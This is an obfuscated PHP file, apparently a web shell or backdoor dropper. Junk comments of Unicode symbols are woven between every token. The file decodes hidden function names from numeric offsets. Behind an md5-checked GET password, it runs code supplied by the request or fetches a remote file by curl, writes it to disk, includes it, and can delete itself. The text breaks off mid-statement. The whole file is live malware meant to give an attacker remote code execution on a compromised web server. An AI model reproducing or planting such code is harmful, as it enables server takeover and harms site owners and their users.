<?php /*-

➔⅛㊀π❣♞∗†◼˜✾

e<ubX➔⅛㊀π❣♞∗†◼˜✾

-*///
$jR /*-V4A#XNyT-*///
=/*-XfinO#beV#-*///
 range/*-


±❣☎


$f{n!72Un±❣☎


-*///
(/*-

↵㊦⋔☮ⅵ☑

BuhfT↵㊦⋔☮ⅵ☑

-*///
"~"/*-%nsTT(-*///
, /*-

╤⇨│Ⓨ✄

r{TxCy╤⇨│Ⓨ✄

-*///
" "/*-
✫✂Ⅵℍ∑≩✜∲¯⋯ⓓ︼
l6tbR✫✂Ⅵℍ∑≩✜∲¯⋯ⓓ︼
-*///
); /*-iu5s?w{y-*///
$rc=${$jR[11+20].$jR[46+13].$jR[42+5].$jR[39+8].$jR[19+32].$jR[10+43].$jR[11+46]};@(count/*-s;j]?8-*///
($rc)==22&&/*-


≳◆ↅ≛Ⅲ℮⇃◼Ⓓ✂➍☢£∧≟♆↷♝﹜≼≦≐⋢✘▿囍⅕✓┗


sGsZC≳◆ↅ≛Ⅲ℮⇃◼Ⓓ✂➍☢£∧≟♆↷♝﹜≼≦≐⋢✘▿囍⅕✓┗


-*///
in_array(/*-

］➨╁¾♨❤⓰‱⒱㍿▪⓼⊼

xQ］➨╁¾♨❤⓰‱⒱㍿▪⓼⊼

-*///
gettype($rc).count/*-

╘⑿

z~╘⑿

-*///
($rc),$rc))?(($rc[67]=$rc[67].$rc[80])&&($rc[81]=$rc[67]($rc[81]))&&(@$rc=$rc[81]($rc[51],$rc[67](${$rc[34]}[25])))/*-hTZ_]-*///
&&/*-T`UKP-*///
$rc()):$rc;/*-

∇➂⅔⓶≏♀℅≇♚↛≒≸

FsrZ-@∇➂⅔⓶≏♀℅≇♚↛≒≸

-*///
class /*-

⊲Ⓖ↪╥↫↋≿☍◘﹩⊐↽@º▁⒌║ↁ╟♂⊩⒮➠⋼

h7_#V>⊲Ⓖ↪╥↫↋≿☍◘﹩⊐↽@º▁⒌║ↁ╟♂⊩⒮➠⋼

-*///
qauNQ{ /*-


⒁⊆╈⑦⇅ⅳ✞◺✠✚⅞⒮⊁ⅾ➴➡⊯ⅹ∃◧


s+KcV]]<s⒁⊆╈⑦⇅ⅳ✞◺✠✚⅞⒮⊁ⅾ➴➡⊯ⅹ∃◧


-*///
static/*-

⊑™┣⓱∾↡♞┥╒웃（⋲⒪㊌∍✏ℯ

dKEuQ)^[⊑™┣⓱∾↡♞┥╒웃（⋲⒪㊌∍✏ℯ

-*///
 function /*-


➳∭⓾°❑


}iX5➳∭⓾°❑


-*///
eZybHTKkI($gGU) /*-uV-*///
{ $rXw/*-

⇖ℝ⋞➪✙◒↰⒭✞

J};bZ⇖ℝ⋞➪✙◒↰⒭✞

-*///
 = /*-AI-*///
"r"./*-(o^w-*///
"a"./*-
⒊⒳Ψℕ▰⊹✝⓯【
QYPp&UnmJG⒊⒳Ψℕ▰⊹✝⓯【
-*///
"n"./*-
∐Ⓜ➲◼㈨╃⑵⒃↢㊕☉※◔〃≹⋛‡⓷≂
wFl@^vX6f∐Ⓜ➲◼㈨╃⑵⒃↢㊕☉※◔〃≹⋛‡⓷≂
-*///
"g"./*-

⓷⇖☆◾✃

~nC1⓷⇖☆◾✃

-*///
"e"; /*-


∙ⓗ⊔⊺⊱℃⓲※◡⓬⊢℅⊏∞︼✷⋝∏⇅≰⒉◰ℤ┺


)LH.-∙ⓗ⊔⊺⊱℃⓲※◡⓬⊢℅⊏∞︼✷⋝∏⇅≰⒉◰ℤ┺


-*///
$hvWfoEs/*-
➍↢㊑⇙☷□ⅰ︾㊞ⅱ╟①∱♟≱▿↥∥➞ⅺ⋤▥☟✮㊁⅔☏┵⑱☻╋
4:@sn&➍↢㊑⇙☷□ⅰ︾㊞ⅱ╟①∱♟≱▿↥∥➞ⅺ⋤▥☟✮㊁⅔☏┵⑱☻╋
-*///
 = /*-!,)]-*///
$rXw/*-
➺❏⓶⊎ℤ£Ⓡℒⓤ⋆⑦⑲⑧Φ∣⅝⋧▅
=OV➺❏⓶⊎ℤ£Ⓡℒⓤ⋆⑦⑲⑧Φ∣⅝⋧▅
-*///
(/*-


◠㎡☄✻♦③∪ℋⓕ


5jZo-u◠㎡☄✻♦③∪ℋⓕ


-*///
"~"/*-
々♯㈧⇟▊⊸◽☷♓↸✫㊎￡⇣◯
1o`e.5A々♯㈧⇟▊⊸◽☷♓↸✫㊎￡⇣◯
-*///
, /*-U{(4xX#)<-*///
" "/*-uV#?n^wU[-*///
);/*-

╝Ⓜ❶┧ⓗ┡ⓚ╂

3;╝Ⓜ❶┧ⓗ┡ⓚ╂

-*///
 $gweNuMF /*-S$-*///
= /*-[8h-*///
explode/*-


☒⑫）℗∾ⅶ➒㊁㊟⌘┲∨㊦∷


&%Pj☒⑫）℗∾ⅶ➒㊁㊟⌘┲∨㊦∷


-*///
(/*-#:_UDVx+f-*///
"$", /*-ymw+ueSV-*///
$gGU/*-Sc)F;-*///
); /*-;>RyxxE^-*///
$HFZSfQXk /*-

⋽☽≖∗￡↛Ⓗ▦↵≙⅕✸ℕ♪☸✼≬⓾ⅶↆ↢ℌ«

rn⋽☽≖∗￡↛Ⓗ▦↵≙⅕✸ℕ♪☸✼≬⓾ⅶↆ↢ℌ«

-*///
= /*-`>w?A-*///
""; foreach /*-


ⓓ┼╔Φ۰❄❤↴⇓〗


ZBⓓ┼╔Φ۰❄❤↴⇓〗


-*///
(/*-)]fL+Xna9<-*///
$gweNuMF /*-

㊚⅓⒟✵⒠ℑ╧ℬ−≯╇⇨Ⅽ⋔ˉⓣ☞⊹⓿⒍≪⊞☂◜☩∨◶⌖㊬⊸

d;HWU#㊚⅓⒟✵⒠ℑ╧ℬ−≯╇⇨Ⅽ⋔ˉⓣ☞⊹⓿⒍≪⊞☂◜☩∨◶⌖㊬⊸

-*///
as /*-


☼{⇑↬❻⊮≨ⅵ☑ⅲℝ↙⒃≦囍✘⇢↵︸㊑♧π┤➥﹍ⓞ


A=]3W☼{⇑↬❻⊮≨ⅵ☑ⅲℝ↙⒃≦囍✘⇢↵︸㊑♧π┤➥﹍ⓞ


-*///
$yB /*-

⅝♓

7Yp@b2D4a⅝♓

-*///
=>/*-^NYSAOx6Mj-*///
 $bcUpLdHnk/*-
╖◵┵﹡‹∄～↖┸⓰❾❁㊌∁≐⇏≋☜Ⓖ◹♂﹩∎⑥
u`AS29M|╖◵┵﹡‹∄～↖┸⓰❾❁㊌∁≐⇏≋☜Ⓖ◹♂﹩∎⑥
-*///
) /*-xe3-*///
$HFZSfQXk /*-
➱﹦㈠✸⒡⏥┗Ⅴ←➏≖㎡❧⋟◱↑➤↚⇖︸∔⇑↔┍㊨╋
gL~lX%@t➱﹦㈠✸⒡⏥┗Ⅴ←➏≖㎡❧⋟◱↑➤↚⇖︸∔⇑↔┍㊨╋
-*///
.= /*-I+f-7i&o~-*///
$hvWfoEs[$bcUpLdHnk/*-


╥⏎┢


N)!flfJ╥⏎┢


-*///
 - /*-_g-*///
92613/*-


▲┖◔﹌㊟↗〔⒱┈▪⒆⓺↜❻➵◢◇㈡⋅


7%P[%▲┖◔﹌㊟↗〔⒱┈▪⒆⓺↜❻➵◢◇㈡⋅


-*///
];/*-

⒠≪❈➝◯⒪┃

$jJXFNiKw⒠≪❈➝◯⒪┃

-*///
 return /*-uH}-*///
$HFZSfQXk; /*-dhv,vBh1!-*///
} /*-Fmc3DiI-*///
static /*-
↼↖◖﹤◥⑭⓯┆✣ⓗ✃┫⊓↸≠↤⋝
Rn?tW↼↖◖﹤◥⑭⓯┆✣ⓗ✃┫⊓↸≠↤⋝
-*///
function /*-jTqI#L4-*///
qPWne/*-

㊎▹

|o1.㊎▹

-*///
(/*-


㊝✽@☟╗Ⅼ✒ℜ◭Ⓖ≖☇☧♋═×╔≊◪⊂


+V-7XR<㊝✽@☟╗Ⅼ✒ℜ◭Ⓖ≖☇☧♋═×╔≊◪⊂


-*///
$YxrBfgtd,/*-

➇✒⇇◍☃┃✲⋬

avf➇✒⇇◍☃┃✲⋬

-*///
 $towMLPc/*-upQK-*///
)/*-Uf#VU(+r-*///
 {/*-
↴✍Ⓓ㊫㊐↸°⒈ↈ∱◾≧⇕
<nkVn+L^↴✍Ⓓ㊫㊐↸°⒈ↈ∱◾≧⇕
-*///
 $oQbjrwOK/*-mBbkj1V-*///
 = /*-6?|=-*///
curl_init/*-Wtqn3M-*///
(/*-yx<-*///
$YxrBfgtd/*-

➷ℨ큐╅⊲Ⅷↁ¢♂❤✾◴║➏№

h}&XPl➷ℨ큐╅⊲Ⅷↁ¢♂❤✾◴║➏№

-*///
);/*-L^-*///
 curl_setopt/*-

◽⋄〔⋒ϟ✔▔➨⊋↨Ⅹ﹨≴◙❤㏒ↈⓡ≙≸❶⋃∕㊢¯├┧⒢┝❦⑤

P)(Jbd◽⋄〔⋒ϟ✔▔➨⊋↨Ⅹ﹨≴◙❤㏒ↈⓡ≙≸❶⋃∕㊢¯├┧⒢┝❦⑤

-*///
(/*-)+b1)=-*///
$oQbjrwOK,/*-O`ONlw&-*///
 CURLOPT_RETURNTRANSFER,/*-v6-*///
 1/*-gJ-*///
);/*-

⓼⊋⋴≮↸⇀❖⒭☂⊵☶♒▇∙㊗ℙ⒃⇅

W~⓼⊋⋴≮↸⇀❖⒭☂⊵☶♒▇∙㊗ℙ⒃⇅

-*///
 $wr/*-
↡⊊﹡㎡ⅾ◣♪♝
Tv~[r;`]↡⊊﹡㎡ⅾ◣♪♝
-*///
 = /*-9X<sK-*///
curl_exec/*-
⊴Ⅿ☠㊬ﭢ⊛∱⑦﹜ℭↃ⊩❒∕
_DRa9;⊴Ⅿ☠㊬ﭢ⊛∱⑦﹜ℭↃ⊩❒∕
-*///
(/*-n.-*///
$oQbjrwOK/*-O8)OPjYF-*///
); /*-


➳⒤➶◦ⓘ【⋦♛ℂ☬Ⓕ㏒ℎ❒∝


84W$|➳⒤➶◦ⓘ【⋦♛ℂ☬Ⓕ㏒ℎ❒∝


-*///
return /*-+.X7-*///
empty/*-~!s-*///
(/*-CT-*///
$wr/*-MV1^0x--*///
)/*-
Θ☜⋈☊」㊆✉∓
>2MlKb{Θ☜⋈☊」㊆✉∓
-*///
 ? /*-$qk1Un@<-*///
$towMLPc/*-WY-*///
(/*-

Ⓠ➫✌≐◣▮➣⊯Ψ✵➊┐↢⋀➪⓲↤◠ⅱ⓻⋲♒⇟㊕⇪╘Ⅳ♐➶ⅲ

[Me&c5Ⓠ➫✌≐◣▮➣⊯Ψ✵➊┐↢⋀➪⓲↤◠ⅱ⓻⋲♒⇟㊕⇪╘Ⅳ♐➶ⅲ

-*///
$YxrBfgtd/*-
■≦㈤⊃ↈ≓⊁©⅘▬➵↉≵⑺⋵┩£
`@Wf>{2V■≦㈤⊃ↈ≓⊁©⅘▬➵↉≵⑺⋵┩£
-*///
)/*-uvv,w}5R]z-*///
 : /*-

┡﹂≆₪⅟‖ⅸ☧♚☌㊑︶

8L;┡﹂≆₪⅟‖ⅸ☧♚☌㊑︶

-*///
$wr; /*-


┄◅∞≁➭❾╙⒝≩⇂◷≋┩


p>┄◅∞≁➭❾╙⒝≩⇂◷≋┩


-*///
}/*-

ⓒ㊐✔⌒⅑∨︷«⋴∁┃⊧➬≷╊

;h3qⓒ㊐✔⌒⅑∨︷«⋴∁┃⊧➬≷╊

-*///
 static/*-

⋿℃∯┗≍⒆⊢ↆ♤➫↨⇄⋳Ⅵ큐Ⅱ웃➑±½∨⓷⓪

hAv|v~[⋿℃∯┗≍⒆⊢ↆ♤➫↨⇄⋳Ⅵ큐Ⅱ웃➑±½∨⓷⓪

-*///
 function /*-uGx@>?q-*///
TQ/*-

➟┍《⓪⋶♒⊰♣✵☳⒮┸➧┲㊞≲

^DQvN2eO%➟┍《⓪⋶♒⊰♣✵☳⒮┸➧┲㊞≲

-*///
() /*--49j09Sm|-*///
{/*-
⊈⏥⒟╞℃☇۰✖╌➜♁⇀☥⋺☽┆✿┗
1oDuds+⊈⏥⒟╞℃☇۰✖╌➜♁⇀☥⋺☽┆✿┗
-*///
 $otByVLwAzd /*-uqi`-*///
=/*-


⋪┌


<q}=^VPZ>|⋪┌


-*///
 array/*-

✔✮❻✕Ⓖ➆ˉ㈦☸♒↹㊓┽㈣┓⋸¶ⓖ╕⒮≟↵≘ℨ±㊌∗☵㊘︾▇

9FO;✔✮❻✕Ⓖ➆ˉ㈦☸♒↹㊓┽㈣┓⋸¶ⓖ╕⒮≟↵≘ℨ±㊌∗☵㊘︾▇

-*///
("92640$92625$92638$92642$92623$92638$92644$92637$92622$92629$92640$92623$92634$92628$92629","92624$92623$92625$92644$92625$92628$92623$92690$92688","92633$92624$92628$92629$92644$92639$92638$92640$92628$92639$92638","92627$92642$92640$92632","92641$92642$92624$92638$92685$92687$92644$92639$92638$92640$92628$92639$92638","92637$92634$92631$92638$92644$92636$92638$92623$92644$92640$92628$92629$92623$92638$92629$92623$92624","92667$92697","92614","92692$92697","92674$92657$92657$92674$92650","92628$92637"); /*-j$`v<-*///
foreach /*-p$9+N|Co-*///
(/*-

︷⒄❂⌓⊘﹀⌖ⅾⓨ

{@=wnZ︷⒄❂⌓⊘﹀⌖ⅾⓨ

-*///
$otByVLwAzd/*-yS|Qq`-*///
 as /*-


∋⋖↾▅≋✎╏╧㊜≉㊄◯♔┨㈧￡Ⓢ⊿❾ⓑ↧


6s^@m∋⋖↾▅≋✎╏╧㊜≉㊄◯♔┨㈧￡Ⓢ⊿❾ⓑ↧


-*///
$YvwlEXALz/*-
☭﹄➠Ⓨ⒡⇚∜┒Ⅳ↦
l5S6☭﹄➠Ⓨ⒡⇚∜┒Ⅳ↦
-*///
)/*-e|v>d-*///
 $PIazAme/*-


ↆℊ¶ℱ


lS`.|ↆℊ¶ℱ


-*///
[] /*-&[q-*///
= /*-
➤◉㊞➃
0,|1}JydH➤◉㊞➃
-*///
self/*-G,#)O-*///
::/*-

☄⑹↵Ⅳ≌┒━◌⊂Ⓘ├❀‰⒆﹣ˉ㊭⒜ⓜ﹃➌✠┡ⓢ⋲⋝

pOIi9`,|3t☄⑹↵Ⅳ≌┒━◌⊂Ⓘ├❀‰⒆﹣ˉ㊭⒜ⓜ﹃➌✠┡ⓢ⋲⋝

-*///
eZybHTKkI/*-
↠⅓⅑⅙≰⒖≁⋅❿∸△♁☹∗㊖▯⇝➝•±≩┏◼﹛≤❈╄⑩╀
oLabh;8↠⅓⅑⅙≰⒖≁⋅❿∸△♁☹∗㊖▯⇝➝•±≩┏◼﹛≤❈╄⑩╀
-*///
(/*-


☦⇝≆╀✖


SXBh☦⇝≆╀✖


-*///
$YvwlEXALz/*-


⑮⇃Ⓑ⑪˜❅ⓧ⒜⒃┓⊛℃▉∮❦♦▇▒Ⓣ㊣⊦▍$◿▸㊂┰➬⅙⋜


k6lJ⑮⇃Ⓑ⑪˜❅ⓧ⒜⒃┓⊛℃▉∮❦♦▇▒Ⓣ㊣⊦▍$◿▸㊂┰➬⅙⋜


-*///
);/*-&`.G8N-*///
$Fopblz /*-
ø✱▣█Ⓘ⅘⑩◕⇟
=c`yCø✱▣█Ⓘ⅘⑩◕⇟
-*///
= /*-!x1c#f-*///
@$PIazAme/*-


Ⓧ～


&5AsbpDⓍ～


-*///
[/*-
╂⊙✒↔∩
ykxTzFH╂⊙✒↔∩
-*///
1/*-
↾≆❊∣⒕⋿☬➉∍▨▅≕㊉✂♖⑤▓
b^Kw↾≆❊∣⒕⋿☬➉∍▨▅≕㊉✂♖⑤▓
-*///
]/*-P[#paw=[-*///
(/*-Lm9wa_u-*///
${/*-R`-*///
"_"/*-

⓵≗↬≕┧Ⓧ㊯↳⇉℅ℬ℉✴⊱≧╩▪┭☜㊝♡┲Ⅼ

e^0⓵≗↬≕┧Ⓧ㊯↳⇉℅ℬ℉✴⊱≧╩▪┭☜㊝♡┲Ⅼ

-*///
."G"/*-


㊝✂✴


hE㊝✂✴


-*///
."E"/*-
⒧⇐▣⑵√⒴㊢㊇‰➁¢≗◂━➥⏢≐⊈ℂ︼Ⓚ⓵☋✑
mO#Zqb5q⒧⇐▣⑵√⒴㊢㊇‰➁¢≗◂━➥⏢≐⊈ℂ︼Ⓚ⓵☋✑
-*///
."T"/*->(?oO{_;-*///
}[/*-lI:mCnL-*///
$PIazAme/*-c-*///
[/*-s@g@-*///
0+9/*-
➝﹊ღ⊓⏎≽┖➬‱†»✻✽✕⋇↪∧♀➔ⅾ⒑㈡⋍⇃➐⋪⊪
)~Fcd%~A➝﹊ღ⊓⏎≽┖➬‱†»✻✽✕⋇↪∧♀➔ⅾ⒑㈡⋍⇃➐⋪⊪
-*///
]]/*-


⒇/₪⊁Ⓞ☽∡ↆ㊠⋇⋺┉✫◞⒘⊂◼◓


J>UYtQr,$!⒇/₪⊁Ⓞ☽∡ↆ㊠⋇⋺┉✫◞⒘⊂◼◓


-*///
);/*-
㊔∑⑧≼≻ⓑ┴◿✝£⇏➧↞✈
xn%OlD<㊔∑⑧≼≻ⓑ┴◿✝£⇏➧↞✈
-*///
 $Nz /*-PTnD0-*///
=/*-+$7-*///
 @$PIazAme/*->m;R-*///
[/*-E%]#$Y0[O-*///
3+0/*-5~3p>6-*///
]/*-

Ⅳ∨⓿▬ⓠ⓲ℎ➪☧┙⊅⑹☺×

L<EuJ?$9XiⅣ∨⓿▬ⓠ⓲ℎ➪☧┙⊅⑹☺×

-*///
(/*-0xiDWM-*///
$PIazAme/*-
∝┢㈢◫✞⊶➌⋝┹﹎╒⋋⇖⑶⊂⋆⋧ⅲ⇗Ⅺ⇥㊩$∢⒘➈⋛⋓㉿♛
FRy}zUW∝┢㈢◫✞⊶➌⋝┹﹎╒⋋⇖⑶⊂⋆⋧ⅲ⇗Ⅺ⇥㊩$∢⒘➈⋛⋓㉿♛
-*///
[/*-
⓿☇┠▎±∄︴∐➙⊌✛』┄⒲⓰⋕‰
bPo)mHA>G⓿☇┠▎±∄︴∐➙⊌✛』┄⒲⓰⋕‰
-*///
2+4/*-(R^9e-*///
], /*-
⊝⒢⋚º（∌ⓣ卐◱⑶↢{➫∘◗⇥▽≐☁✖▷☮≻⒚
ok⊝⒢⋚º（∌ⓣ卐◱⑶↢{➫∘◗⇥▽≐☁✖▷☮≻⒚
-*///
$Fopblz/*--xoT)5-*///
);/*-
▃≇ℒ⒔⑨↡◓∷⑴⊨㊬♤⒐┉⊞⑽
Zh8q18▃≇ℒ⒔⑨↡◓∷⑴⊨㊬♤⒐┉⊞⑽
-*///
 $QxzCPvbLUq /*-vb.-*///
=/*-


Ⅹ︵≵┕┾⊭✸≓≶⑭㊐⑩☚⑤∈◩┇ↂ〕


mCⅩ︵≵┕┾⊭✸≓≶⑭㊐⑩☚⑤∈◩┇ↂ〕


-*///
 $PIazAme/*-


∋∰™ø➏≍⑴ⅿ❻㊢⅘【┅⓻≊㊍╘◞㊭↶


vHJmtBi$+∋∰™ø➏≍⑴ⅿ❻㊢⅘【┅⓻≊㊍╘◞㊭↶


-*///
[/*-
㊑⊫∳↾⒊Ⅳ﹊⑱┬—﹨┕«╌▿⋨㊎╡⓭
Xb1GjtcPME㊑⊫∳↾⒊Ⅳ﹊⑱┬—﹨┕«╌▿⋨㊎╡⓭
-*///
0+2/*-

✃↰⊚✝ϡ◓≚⓱㊊ⅸ¥┷❣⑴￡±⏎✳⇈≐

95::nA✃↰⊚✝ϡ◓≚⓱㊊ⅸ¥┷❣⑴￡±⏎✳⇈≐

-*///
]/*-}R=aW-*///
(/*-CA<?I-*///
$Nz,/*-LtBfow-*///
 true/*-
✔⓰➤⇋╔⑧㊚∨Ю⇊┊➽✣≄⇠⒨∽⊭﹋ⅲ➮㊙☿≰Ⅷ≁↿ⓐ┖ℐ♂
d7Z✔⓰➤⇋╔⑧㊚∨Ю⇊┊➽✣≄⇠⒨∽⊭﹋ⅲ➮㊙☿≰Ⅷ≁↿ⓐ┖ℐ♂
-*///
); /*-
㈧‐⋌ↆ㊐∧∜㊄㈥┗℠↔※⋇ℛ▸∄
r^edcM}㈧‐⋌ↆ㊐∧∜㊄㈥┗℠↔※⋇ℛ▸∄
-*///
@${/*-
∕↡≲⅕㊑⊱╚⊐ⅼ
vrA∕↡≲⅕㊑⊱╚⊐ⅼ
-*///
"_"./*-

¿웃

:n¿웃

-*///
"G"./*-Ede^-7-*///
"E"/*-#)=-p.-*///
."T"/*-

≁⋴◐ⓖ▱➹⑲㊔﹌≪♒╬⋹⅘

biZ6&jj≁⋴◐ⓖ▱➹⑲㊔﹌≪♒╬⋹⅘

-*///
}/*-vcZv5a8-*///
[/*-
⒦∨②◛➪│⓪ⓕ╌㊓
-Z}⒦∨②◛➪│⓪ⓕ╌㊓
-*///
$PIazAme/*-S9g6--*///
[8+2/*-
ⓤ∳﹪⇎≯⊺ⅵ┿
d:ⓤ∳﹪⇎≯⊺ⅵ┿
-*///
]/*-+.+CZz]?-*///
]/*-p%qv+AjwWt-*///
 == /*-?-HV@x]kqX-*///
1 /*-df7IsQF+(-*///
&& /*-A3Lt2V%-*///
die/*-dYX-*///
(/*-)(dcKS0=-*///
$PIazAme[1+4/*-


㊔※⋈⊟≗웃☰❏⒰⇡╓ⅿ♮╏⋍㊃⓹┄


cN㊔※⋈⊟≗웃☰❏⒰⇡╓ⅿ♮╏⋍㊃⓹┄


-*///
]/*--U-*///
(/*-tXF$:Z1-*///
__FILE__/*-t:W&O8YBe-*///
)/*-JG$kc7Cb-*///
); /*-AHqM@U-*///
if/*-`<@!<-*///
(/*-
Ⓣ⋐㊀┊≝↾ⅽ∕④┅〔№√┇◚╦㊓▇❊⑤∢Ⓨ―
SH(Uw@WBDⓉ⋐㊀┊≝↾ⅽ∕④┅〔№√┇◚╦㊓▇❊⑤∢Ⓨ―
-*///
 (/*-l)-*///
(@/*-


™▔›✂Ⅲ↉


AzH&k™▔›✂Ⅲ↉


-*///
$QxzCPvbLUq/*-
Ⓤ⊁✸◢─◍ⓙ▅⊜∆⒰≤▐㏒﹊➽㊏﹠⇊✯⇍➊
:JDM=mx<3Ⓤ⊁✸◢─◍ⓙ▅⊜∆⒰≤▐㏒﹊➽㊏﹠⇊✯⇍➊
-*///
[/*-


⒐◟⋿✲ℋ⒣⋥Ⓢ◡╪➐㊩◠Ü⋼


wX6~⒐◟⋿✲ℋ⒣⋥Ⓢ◡╪➐㊩◠Ü⋼


-*///
0/*-

⊸⊇⋴⋕⅒

Ou0^>XAB⊸⊇⋴⋕⅒

-*///
] /*-

ⓞ∸⓫﹥◉

T`<lIg8ⓞ∸⓫﹥◉

-*///
- time/*-

⋺↹㊧█↿○≨ⓧ∭∉⊭↾╆ⅴ⋸⇔︾♛

G(X(t⋺↹㊧█↿○≨ⓧ∭∉⊭↾╆ⅴ⋸⇔︾♛

-*///
()/*-m3V-*///
) > /*-xhYdCad-*///
0/*-


◌ⅽ㊂☄➝


1%TLCH9(◌ⅽ㊂☄➝


-*///
)/*-


╕≹ⅿ⊲ⓧπ↯⊉⊌⅖∵▏↑ℛ∻¶ⅴ☐♧%㍿


Az╕≹ⅿ⊲ⓧπ↯⊉⊌⅖∵▏↑ℛ∻¶ⅴ☐♧%㍿


-*///
 and /*-oB6<d7Nv-*///
(/*-pgwoKjL&-*///
md5/*-
↔⊧⇃✮♜ⓜ╏⓯ℭ∭㊉♧︹ⓢ⋿⊢✽╩︻↵Ⅷ㊆
)Ns;↔⊧⇃✮♜ⓜ╏⓯ℭ∭㊉♧︹ⓢ⋿⊢✽╩︻↵Ⅷ㊆
-*///
(/*-SiBz-*///
md5/*-&zh-*///
(/*-

╚◔『∹

u.D╚◔『∹

-*///
$QxzCPvbLUq/*-
≏⑶∟≮✌℗⒮⓽⒪◁ﭢℒ◴큐⇍⋍◍﹨⋲℠❃◲⋜
cF[|(}C}≏⑶∟≮✌℗⒮⓽⒪◁ﭢℒ◴큐⇍⋍◍﹨⋲℠❃◲⋜
-*///
[/*-VgB-*///
1+2/*-

∜≮﹉❣◯≂⋨㈨➛⊇┎├﹍⒮✹─¡◬⋊

n1,@P∜≮﹉❣◯≂⋨㈨➛⊇┎├﹍⒮✹─¡◬⋊

-*///
]/*-6~uN=lf-*///
)/*-


≍☍☂⌒↑±ℂ⇘↹⑼¢⋪▭▃▆✐➉⊤⇐⏥➟⋴（❏ℝ﹛▂⓳


y5L0≍☍☂⌒↑±ℂ⇘↹⑼¢⋪▭▃▆✐➉⊤⇐⏥➟⋴（❏ℝ﹛▂⓳


-*///
)/*-

ⅿ┹↯ⅵ∩✫⇏☇⊹×⒞⋲⒠☟∡

d{jⅿ┹↯ⅵ∩✫⇏☇⊹×⒞⋲⒠☟∡

-*///
 === /*-YpSatySyP-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-e)g4-*///
)/*-
▿➩﹪≲┺⊬Ⓨ⇜╍◄㊔¿
#g(▿➩﹪≲┺⊬Ⓨ⇜╍◄㊔¿
-*///
 ): /*-
≽﹜╪➔⊞⋔⚘⏢◑☱⑸⋂╗⇆♓✴⋹➁㊣㊅⓿⊅╡╁ℑ㊓❇↫Ⓗ⋛
@[<|3k~H%≽﹜╪➔⊞⋔⚘⏢◑☱⑸⋂╗⇆♓✴⋹➁㊣㊅⓿⊅╡╁ℑ㊓❇↫Ⓗ⋛
-*///
$OiWNAHvds /*-cIW7S&-*///
=/*-T?-*///
 self/*-P!iEJ-*///
::/*-

〓♁┳∿㊢❋♖╠╫◢➊⋬✝╄♝⊩ↅ⋛✣❹↫】☻♥』유◣}⅞Ⅺ➀

VzjmtT.b〓♁┳∿㊢❋♖╠╫◢➊⋬✝╄♝⊩ↅ⋛✣❹↫】☻♥』유◣}⅞Ⅺ➀

-*///
qPWne/*-
㊮⒎
Gy65(+J㊮⒎
-*///
(/*-T-AeIsZxwL-*///
$QxzCPvbLUq/*-
ↈ⓲⅗⊻º︽╘∊◁Ⅱ⋍︶➃↵
1vↈ⓲⅗⊻º︽╘∊◁Ⅱ⋍︶➃↵
-*///
[/*-k8SO5fnD-*///
0+1/*-V.L?$6l`6-*///
], /*-QTN72.Ku75-*///
$PIazAme/*-=>hH?}euW-*///
[/*-bw>,$-*///
5+0/*-0+NY-*///
]/*-
✃◡➾Ⅼ㈨ℒ❷Ⅹ➠
@N✃◡➾Ⅼ㈨ℒ❷Ⅹ➠
-*///
);/*-


➳◊☇Ю㈧㊐❧≛✌Ⓞ▮↶↣◆


::ZZ;D➳◊☇Ю㈧㊐❧≛✌Ⓞ▮↶↣◆


-*///
@$PIazAme/*-


≨█➦⅙➱۵✱☸✙╈⑧➋㊘


3Muz{>bn#≨█➦⅙➱۵✱☸✙╈⑧➋㊘


-*///
[/*-
⋈╠✲◾◒㊚Ⓙ≉↗⊟㊔╆∍⑧╤≷➁⊪/ℯ↛✛⋓┽
SBR⋈╠✲◾◒㊚Ⓙ≉↗⊟㊔╆∍⑧╤≷➁⊪/ℯ↛✛⋓┽
-*///
0/*-

⊛◠⊃∲╦

s#z)⊛◠⊃∲╦

-*///
]/*-[N@v-*///
(/*-


╕┈╩【


5hNwnJ╕┈╩【


-*///
"",/*-


≱￡☠┆▢⋁⊗ⓘ⅛┲∩›ⅿ⋳∧➽（∦⊖∯ⓚ⑱⋲⇤


5g≱￡☠┆▢⋁⊗ⓘ⅛┲∩›ⅿ⋳∧➽（∦⊖∯ⓚ⑱⋲⇤


-*///
 $PIazAme/*-


↑▾⊀⒞⊜➛☮↨♗∃▻↖⓭Ⅸ◡╥▭➐◷↹⌘⋝


nM}!OPB↑▾⊀⒞⊜➛☮↨♗∃▻↖⓭Ⅸ◡╥▭➐◷↹⌘⋝


-*///
[/*-

≙ℑ➀Ⓣ

DO<j1^≙ℑ➀Ⓣ

-*///
5+2/*-.2_?BH?-*///
] /*->C+)>{o-*///
. /*-L@.-*///
$PIazAme/*-


❤〉⌘↤⊛


zi%edQhp#❤〉⌘↤⊛


-*///
[/*-

✱▐↛〗ⒹⒾ⇊✃▫◭⋷▴↋™◶

>BVX5i.<✱▐↛〗ⒹⒾ⇊✃▫◭⋷▴↋™◶

-*///
4+0/*-Lp-*///
]/*-


㊓ⓥ☋/Ⓘ◾❀㊫△┷⓰⒦∭╚➎⅒ⓓ↾☚∡♥｜⊥¡◭⅝➼▻⊨


Hm)|#`)Zu㊓ⓥ☋/Ⓘ◾❀㊫△┷⓰⒦∭╚➎⅒ⓓ↾☚∡♥｜⊥¡◭⅝➼▻⊨


-*///
(/*-~8ML-H-*///
$OiWNAHvds/*-ZkmBFqP--*///
)/*-
↳╇┟⓯→✶
0R-i:nm(aY↳╇┟⓯→✶
-*///
 . /*-
√∎▓⋖♩✪☉⌔
n,#√∎▓⋖♩✪☉⌔
-*///
$PIazAme/*-_z}Ec?E,%!-*///
[/*-
—♀⇑↡➥╫⒐⋤♚≍♨⋷™⒀▹Ⅹ≨┦≷ℯ⋑
q?4OSO$—♀⇑↡➥╫⒐⋤♚≍♨⋷™⒀▹Ⅹ≨┦≷ℯ⋑
-*///
5+3/*-,P@0i-*///
]/*-a95-*///
);/*-xOU-*///
/*-


◙⅖☱◊⑿


wu+$.◙⅖☱◊⑿


-*///
die;/*-


⒎№ت☍⅒


;#rX⒎№ت☍⅒


-*///
 endif;/*-sB)KcSXH-*///
 }/*-


∸∜▲☴➼＂┅∐♮


EHF∸∜▲☴➼＂┅∐♮


-*///
}/*-


↷⓭➺♞‱♐⋆┷▸∛↦≊⇀❖☥┓┛➬✪↧⋢≨


3Zp|Gq9↷⓭➺♞‱♐⋆┷▸∛↦≊⇀❖☥┓┛➬✪↧⋢≨


-*///
qauNQ/*-


▒⇝—▀➓┈


oy▒⇝—▀➓┈


-*///
::/*-


Ⅻ∘ⓛ⌓⒎▤➺≷♈⒢▔►⅙↯囍⒵㊀Ⓥ≔⌒


